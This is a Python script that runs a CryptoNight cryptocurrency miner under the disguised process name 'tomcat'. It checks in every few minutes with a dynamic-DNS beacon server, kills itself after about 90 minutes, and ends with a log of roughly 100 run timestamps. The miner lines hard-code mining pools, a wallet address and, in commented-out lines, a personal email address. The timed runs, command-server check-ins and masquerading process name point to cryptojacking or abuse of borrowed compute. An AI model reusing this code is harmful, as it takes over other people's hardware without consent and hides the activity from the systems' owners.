import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:43:05.799186
#2018-02-17 16:30:04.634145
#2018-02-17 18:18:05.104920
#2018-02-17 20:06:01.641257
#2018-02-17 21:54:01.740004
#2018-02-17 23:39:01.892137
#2018-02-18 01:28:01.785280
#2018-02-18 03:15:05.450516
#2018-02-18 05:04:07.001272
#2018-02-18 06:57:04.085246
#2018-02-18 08:45:01.539763
#2018-02-18 10:32:04.315574
#2018-02-18 12:17:03.882866
#2018-02-18 14:04:03.550970
#2018-02-18 15:54:03.883652
#2018-02-18 17:45:07.427171
#2018-02-18 19:32:07.859744
#2018-02-18 21:17:04.529089
#2018-02-18 23:05:05.946024
#2018-02-19 00:52:02.055587
#2018-02-19 02:38:06.850013
#2018-02-19 04:24:01.649494
#2018-02-19 06:09:01.895778
#2018-02-19 07:57:05.878811
#2018-02-19 09:48:06.511373
#2018-02-19 11:38:04.634598
#2018-02-19 13:26:07.344907
#2018-02-19 15:16:08.648269
#2018-02-19 17:05:11.567275
#2018-02-19 18:51:08.027182
#2018-02-19 20:40:04.965097
#2018-02-19 22:27:04.019466
#2018-02-20 00:12:05.984454
#2018-02-20 01:59:01.593027
#2018-02-20 03:48:08.111863
#2018-02-20 05:32:03.566967
#2018-02-20 07:16:07.690346
#2018-02-20 09:03:07.044450
#2018-02-20 10:47:06.258746
#2018-02-20 12:34:08.818817
#2018-02-20 14:20:08.266927
#2018-02-20 16:04:04.731551
#2018-02-20 17:50:11.059509
#2018-02-20 19:42:01.487756
#2018-02-20 21:28:07.484819
#2018-02-20 23:12:07.387281
#2018-02-21 00:56:01.330215
#2018-02-21 02:43:07.318094
#2018-02-21 04:33:06.346639
#2018-02-21 06:22:06.678973
#2018-02-21 08:07:04.548531
#2018-02-21 09:52:08.295237
#2018-02-21 11:41:07.938525
#2018-02-21 13:31:09.250030
#2018-02-21 15:17:10.315081
#2018-02-21 17:09:06.328653
#2018-02-21 18:57:04.866108
#2018-02-21 20:38:05.161768
#2018-02-21 22:23:06.391234
#2018-02-22 00:12:06.948911
#2018-02-22 02:01:07.844963
#2018-02-22 03:47:01.587925
#2018-02-22 05:34:06.743941
#2018-02-22 07:19:06.367191
#2018-02-22 09:06:07.415869
#2018-02-22 10:54:07.888234
#2018-02-22 12:40:10.178077
#2018-02-22 14:26:07.986445
#2018-02-22 16:14:02.054343
#2018-02-22 18:02:06.659135
#2018-02-22 19:51:05.753517
#2018-02-22 21:40:06.976938
#2018-02-22 23:27:05.941423
#2018-02-23 01:14:03.997710
#2018-02-23 03:01:07.193920
#2018-02-23 04:48:07.009431
#2018-02-23 06:36:07.059202
#2018-02-23 08:24:05.420609
#2018-02-23 10:40:07.655439
#2018-02-23 12:34:07.025131
#2018-02-23 14:21:07.689743
#2018-02-23 16:14:01.968390
#2018-02-23 18:01:06.028134
#2018-02-23 19:46:07.574938
#2018-02-23 21:31:07.035473
#2018-02-23 23:19:04.040861
#2018-02-24 01:09:06.810960
#2018-02-24 03:01:05.602445
#2018-02-24 04:47:05.697267
#2018-02-24 06:32:06.183870
#2018-02-24 08:20:07.234073
#2018-02-24 10:04:05.229495
#2018-02-24 12:02:01.821280
#2018-02-24 13:49:04.826343
#2018-02-24 15:30:08.614448
#2018-02-24 17:21:05.855405
#2018-02-24 19:10:04.642538
#2018-02-24 20:59:04.033702
#2018-02-24 23:29:05.078737
#2018-02-25 02:53:06.124345
#2018-02-25 06:31:06.116310